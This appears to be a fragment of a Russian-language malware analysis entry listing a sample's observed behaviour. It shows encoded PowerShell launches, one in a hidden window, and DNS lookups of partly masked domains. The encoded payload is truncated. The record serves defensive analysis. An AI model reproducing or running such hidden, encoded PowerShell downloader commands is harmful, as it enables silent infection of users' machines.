Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABMAHUAaQB1AGwAcgBnAGEAPQAnAEcAbwBqAGMAeQBhAGsAawAnADsAJABFAHUAdABwAGYAZABxAHkAdgBkACAAPQAgACcAMgA4AD...
- DNS ASK ap####source.com
- DNS ASK z3####rketing.com
- DNS ASK ai##ah.com
- DNS ASK ds##ng.com
- DNS ASK ra###hzawar.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABMAHUAaQB1AGwAcgBnAGEAPQAnAEcAbwBqAGMAeQBhAGsAawAnADsAJABFAHUAdABwAGYAZABxAHkAdgBkACAAPQAgACcAMgA4AD...' (со скрытым окном)